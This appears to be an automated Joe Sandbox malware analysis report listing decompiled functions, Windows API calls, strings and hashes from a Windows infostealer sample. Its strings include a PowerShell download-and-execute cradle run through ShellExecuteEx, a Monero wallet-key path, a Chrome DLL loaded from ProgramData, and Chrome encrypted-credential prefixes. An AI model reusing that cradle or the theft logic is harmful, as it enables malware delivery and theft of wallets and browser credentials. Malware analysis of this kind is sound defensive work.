                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 9dbc2d9943dc8eb26bf090e49357f6a6914326b7f2990019763a1c3185da7510
                                      • Instruction ID: 6d3e3214620e09005a8bfc81277123ce74fda668e8ab1618ae3fdd1886dff6f3
                                      • Opcode Fuzzy Hash: 9dbc2d9943dc8eb26bf090e49357f6a6914326b7f2990019763a1c3185da7510
                                      • Instruction Fuzzy Hash: 093182B290021867DB28EBF0EC85EDD737CAB98700F404599F21596089EF78A7C9DF94
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F22FD5
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F22F54
                                      • ')", xrefs: 00F22F03
                                      • <, xrefs: 00F22F89
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F22F14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 9e05004cce6d5b704e8a83d48068d2873e1a556c3aaaf071da2bc15a8773e005
                                      • Instruction ID: 7f8fc7720d689c0f9943b8baa95d4f378861e46114c78f0398c1ed2f574184e0
                                      • Opcode Fuzzy Hash: 9e05004cce6d5b704e8a83d48068d2873e1a556c3aaaf071da2bc15a8773e005
                                      • Instruction Fuzzy Hash: 22411D71D002289BDB15EFA0ECA2FEDBB79AF50304F404459E00677192DF786A49DF92
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: e385cefbd0fd0c8738a11dc664a451301f0efc6fd873575cafcad4e074ee7d76
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 07219272E00698AFDB21BF55CC41AEF3A79EB82BA4F054115F90967211C3344D41ABF0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C390,00000000,00020119,?), ref: 00F27FEE
                                      • RegQueryValueExA.ADVAPI32(?,01D8D720,00000000,00000000,000000FF,000000FF), ref: 00F2800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00F28022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 0d40c9a4f8f38e9f6830501a19f326e48d0e6de9bd00a46c1a40c13f9b83d39b
                                      • Instruction ID: f07dfc2a823b6d08f935413c2a4f72698980910da88e38625141bb81b56dab01
                                      • Opcode Fuzzy Hash: 0d40c9a4f8f38e9f6830501a19f326e48d0e6de9bd00a46c1a40c13f9b83d39b
                                      • Instruction Fuzzy Hash: B2118FB2A40216EBE714CBC4ED45F7BBBB8EB04B10F104129F621AB284D77558409BA1
                                      APIs
                                      • StrStrA.SHLWAPI(01D8DEE8,00000000,00000000,?,00F19F71,00000000,01D8DEE8,00000000), ref: 00F293FC
                                      • lstrcpyn.KERNEL32(011E7580,01D8DEE8,01D8DEE8,?,00F19F71,00000000,01D8DEE8), ref: 00F29420
                                      • lstrlen.KERNEL32(00000000,?,00F19F71,00000000,01D8DEE8), ref: 00F29437
                                      • wsprintfA.USER32 ref: 00F29457
                                      Strings
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: cdebc0be9f486573d2e31e86e35ee8182c5ae9fcc681300062564fb1b915975d
                                      • Instruction ID: 323095cbdb5e532b42ad952792e288c88b3006321488395906236a2aada7f7b9
                                      • Opcode Fuzzy Hash: cdebc0be9f486573d2e31e86e35ee8182c5ae9fcc681300062564fb1b915975d
                                      • Instruction Fuzzy Hash: 60010C76500248FFEB08DFE8D948AAE7BB9EF48314F108258F9199B244D731EA40DBD0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F112B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F112BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F112D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F112F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00F112FF
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: b10f5033edf00ce9bdeb8c7334a1f1b96cb478a0395bde721dd2ed50f8f3c022
                                      • Instruction ID: de093eae0a214000f64f6bfdb4de75c5a00f3fd0e791819dea0dd7dff31a15a6
                                      • Opcode Fuzzy Hash: b10f5033edf00ce9bdeb8c7334a1f1b96cb478a0395bde721dd2ed50f8f3c022
                                      • Instruction Fuzzy Hash: 1501CD79A40309BBEB18DFD4D849FAE77B9AB48701F1041A9FA159B2C4D6709A409B90
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00F26903
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F269C6
                                      • ExitProcess.KERNEL32 ref: 00F269F5
                                      Strings
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 5c8a7be7633ea96969c519ab0dba5c11bcc28d484c4c4751efcdec1d4b282d06
                                      • Instruction ID: 8c23af70247207dc17a1e14ad79f0ee7a2f67b97b6b1a9b92ccfd2d4863c2965
                                      • Opcode Fuzzy Hash: 5c8a7be7633ea96969c519ab0dba5c11bcc28d484c4c4751efcdec1d4b282d06
                                      • Instruction Fuzzy Hash: 273130B1901228ABDB18EB90ED92FDDB778AF54300F804199F21577185DF786B88CF55
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00F30E10,00000000,?), ref: 00F289BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F289C6
                                      • wsprintfA.USER32 ref: 00F289E0
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: ebeddc5d190792e1eeff587a00b4edca66b269677133808aca332e8fc5949635
                                      • Instruction ID: ed894094adc406530f9fac54ed3a3cecc095b5629ad53298242fa66057753e7b
                                      • Opcode Fuzzy Hash: ebeddc5d190792e1eeff587a00b4edca66b269677133808aca332e8fc5949635
                                      • Instruction Fuzzy Hash: 7A2160B1A40205AFEB14DFD4DD45FAEBBB8FB48711F104119F615AB2C4C7759940CBA1
                                      APIs
                                      • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00F1A098
                                      Strings
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                      • API String ID: 1029625771-1545816527
                                      • Opcode ID: 5f3e057b69b5e3d27f0cb696a0127127c9817df529211348e8eb0d3f42e93fbc
                                      • Instruction ID: a14bc3e9d1477e8b35aeeeb961a5a7a64ff18ae8fa293bf621c5d6929ce0c2ed
                                      • Opcode Fuzzy Hash: 5f3e057b69b5e3d27f0cb696a0127127c9817df529211348e8eb0d3f42e93fbc
                                      • Instruction Fuzzy Hash: 3CF01D79655304AFE729ABE0EA48BA63BD4B306360F001634F5369B1C4C2B598C4DBE2
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00F296AE,00000000), ref: 00F28EEB
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F28EF2
                                      • wsprintfW.USER32 ref: 00F28F08
                                      Strings
                                      Similarity
                                      • API ID: Heap$AllocateProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 769748085-2783943728
                                      • Opcode ID: dc9ceb1a76be6e5764b705318cd02e6ceb38b51caa7dfb1b92b1dd42bf43ed81
                                      • Instruction ID: 4fb74ec641943ef48fd7ccf32e2c3f3b2ca1c1d30cfc4ed84712141aecb25bdf
                                      • Opcode Fuzzy Hash: dc9ceb1a76be6e5764b705318cd02e6ceb38b51caa7dfb1b92b1dd42bf43ed81
                                      • Instruction Fuzzy Hash: 96E0EC75A44309BBEB28DBD4DD0AE6D77B8EB05702F0001A5FE099B380DA719E509BD2
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1AA11
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00F1AB2F
                                      • lstrlen.KERNEL32(00000000), ref: 00F1ADEC
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1AE73
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 3d8e621507203fd399b1dffe5348902fd6f6abd48982cafab27ad44662e1219f
                                      • Instruction ID: 0bd89b0a02b8d6e610b81244004bfc7d4c8431fa4f0ff35d492591001f0c6f33
                                      • Opcode Fuzzy Hash: 3d8e621507203fd399b1dffe5348902fd6f6abd48982cafab27ad44662e1219f
                                      • Instruction Fuzzy Hash: 5CE103729101289BCB19FBE4EDA2EEE7339BF54300F408559F51676091EF386A4CDB62
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D581
                                      • lstrlen.KERNEL32(00000000), ref: 00F1D798
                                      • lstrlen.KERNEL32(00000000), ref: 00F1D7AC
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1D82B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: a11dd2a431a74107e5e50494931e877d30f47171afc05a855675a6dce9ab317c
                                      • Instruction ID: 10a3b4ddbe02bffb4867d3a74853a5f590021c987873aadb780110440fbd72e2
                                      • Opcode Fuzzy Hash: a11dd2a431a74107e5e50494931e877d30f47171afc05a855675a6dce9ab317c
                                      • Instruction Fuzzy Hash: 4B913072D101289BCB19FBE0EDA2EEE7339BF54304F404568F51676091EF386A48DB62
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F28CF0: GetSystemTime.KERNEL32(00F30E1B,01D8A7B0,00F305B6,?,?,00F113F9,?,0000001A,00F30E1B,00000000,?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F28D16
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F1D901
                                      • lstrlen.KERNEL32(00000000), ref: 00F1DA9F
                                      • lstrlen.KERNEL32(00000000), ref: 00F1DAB3
                                      • DeleteFileA.KERNEL32(00000000), ref: 00F1DB32
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                      • String ID:
                                      • API String ID: 211194620-0
                                      • Opcode ID: 51314a34bafad851516dd583089746439468d63d1f8e85b50ba0cda605e5470c
                                      • Instruction ID: 7bf6d97b4d05838f7161e1fb4ca954c038ecbd7e45e131f3e03b4d28b97826e3
                                      • Opcode Fuzzy Hash: 51314a34bafad851516dd583089746439468d63d1f8e85b50ba0cda605e5470c
                                      • Instruction Fuzzy Hash: 4E812572D101289BCB19FBE4ECA2EEE7379BF54304F404568F51676091EF386A48DB62
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustPointer
                                      • String ID:
                                      • API String ID: 1740715915-0
                                      • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction ID: 82156ee119ebf291c89af513c54a2e2b60a9fc4ef0bfd6460dddd35b19a42307
                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: 1B51C372900206AFEF29AF54C841BFA77A4FF41320F24422DEA15875A1EB35ED44FB90
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F1A664
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 6dd63a60a4cd05f3602e9a14b5deff8afedb6d6aab1e89ed9c990140a418773d
                                      • Instruction ID: 27fe9cdb238fd1aa7506f2b12d37b91f0fc13e43897357836eddd0b212b515a9
                                      • Opcode Fuzzy Hash: 6dd63a60a4cd05f3602e9a14b5deff8afedb6d6aab1e89ed9c990140a418773d
                                      • Instruction Fuzzy Hash: E9514C70A10208EFDB14EFA4DD96FED7776BF44304F008018F90A6B291EB74AA45EB52
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
